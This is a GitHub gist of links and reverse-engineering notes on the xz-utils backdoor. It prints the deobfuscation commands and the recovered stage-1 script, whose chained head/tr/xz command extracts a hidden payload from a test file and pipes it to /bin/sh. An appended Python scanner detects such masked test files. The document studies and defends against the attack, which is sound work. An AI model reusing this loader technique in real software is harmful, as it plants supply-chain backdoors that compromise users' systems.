@Akanoa
Last active April 6, 2024 17:23
a lot of resources about xz
// patch to the security note, made by JiaT75 himself
https://salsa.debian.org/debian/xz-utils/-/blame/b43c3e48bf6097095eef36d44cdbec811074940a/.github/SECURITY.md#L12
// patch m4 file on sid debian
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L63
// backport 5.6.0
https://salsa.debian.org/debian/xz-utils/-/commit/12388833e66a4ddafe08571882ad638a511cf68b?page=10#71e626f2c3f59e8b311f7777379f651145fda3d3
// read payload stage 0 -> stage 1
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L95
// build to host patch
https://www.diffchecker.com/DxS4Wz01/
// xz bot
https://github.com/amlweems/xzbot
// target only x86_64 arch
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L29
// target only GNU linker
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L51
// reverse double obfuscated payload
https://gynvael.coldwind.pl/?lang=en&id=782
// payloads
https://git.tukaani.org/?p=xz.git;a=commit;h=6e636819e8f070330d835fce46289a3ff72a7b89
// xz-scripts
https://research.swtch.com/xz-script
// file rename (to delay the attack?)
https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea
// reverse
// remap symbols
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" > bad-3-corrupt_lzma2_remap.xz
// diff binary
diff <(xxd tests_files_bad-3-corrupt_lzma2.xz) <(xxd bad-3-corrupt_lzma2_remap.xz)
7,8c7,8
< 00000060: e005 1601 5f5d 0005 20a5 2d55 bb98 047c ...._].. .-U...|
< 00000070: c699 bca0 664d cd31 ad0b 2920 b828 0c2e ....fM.1..) .(..
---
> 00000060: e005 1601 2d5d 0005 09a5 5f55 bb98 047c ....-]...._U...|
> 00000070: c699 bca0 664d cd31 ad0b 2909 b828 0c2e ....fM.1..)..(..
12c12
< 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f2d .I.`?......[.a.-
---
> 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f5f .I.`?......[.a._
18,19c18,19
< 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 09ac 2a24 n..).l.X.w,(..*$
< 00000120: 1320 1921 7c03 4a30 b202 1898 d120 2034 . .!|.J0..... 4
---
> 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 20ac 2a24 n..).l.X.w,( .*$
> 00000120: 1309 1921 7c03 4a30 b202 1898 d109 0934 ...!|.J0.......4
// real stage 1
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d
####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
// discard 1 KB, take 2 KB, discard 1 KB, ..., take 939 bytes
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
// get the stage 2 payload
./take_relevant-step3.sh
xz -F raw --lzma1 -dc good-large_uncompressed_remap.bi
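A detection-side version of the remap trick shown under "// remap symbols" and "// real stage 1", as an added example that is not part of this gist: it applies the same `tr "\t \-_" " \t_\-"` byte swap to each .xz test file and flags any file that, only after the swap, becomes a valid stream with a shell script inside. The scanner, its marker list and the masked sample are constructed here for illustration; only `scan_dir` needs a real tests/files directory.

```python
import lzma
from pathlib import Path
from typing import Dict, Optional

# Byte swap equivalent to: tr "\t \-_" " \t_\-"  (tab<->space, '-'<->'_').
# The swap is its own inverse, so applying it to a masked file recovers the stream.
REMAP = bytes.maketrans(b"\t -_", b" \t_-")

# Strings the recovered stage-1 script is seen to contain in the output above.
SCRIPT_MARKERS = (b"####Hello####", b"/bin/sh", b"config.status", b"uname")


def unmask(data: bytes) -> Optional[bytes]:
    """Apply the remap and decompress; None if the result is not a valid .xz stream."""
    try:
        return lzma.decompress(data.translate(REMAP), format=lzma.FORMAT_XZ)
    except lzma.LZMAError:
        return None


def scan_blob(data: bytes) -> Dict[str, object]:
    """Report whether a test file hides a shell script behind the tab/space/dash swap."""
    recovered = unmask(data)
    hits = [] if recovered is None else [m.decode() for m in SCRIPT_MARKERS if m in recovered]
    return {
        "valid_after_remap": recovered is not None,
        "script_markers": hits,
        "suspicious": bool(hits),
    }


def scan_dir(tests_dir: str) -> Dict[str, Dict[str, object]]:
    """Scan every .xz file in a directory such as a source tree's tests/files."""
    return {p.name: scan_blob(p.read_bytes()) for p in Path(tests_dir).glob("*.xz")}


# Constructed sample: a harmless script masked the same way (NOT the real payload).
HARMLESS_SCRIPT = b'####Hello####\n[ ! $(uname) = "Linux" ] && exit 0\necho from-test\n'
MASKED_SAMPLE = lzma.compress(HARMLESS_SCRIPT, format=lzma.FORMAT_XZ).translate(REMAP)
# A normal compressed test vector with no script behind it, for comparison.
BENIGN_SAMPLE = lzma.compress(b"plain test vector data\n", format=lzma.FORMAT_XZ)

if __name__ == "__main__":
    for name, blob in (("masked", MASKED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_blob(blob))
```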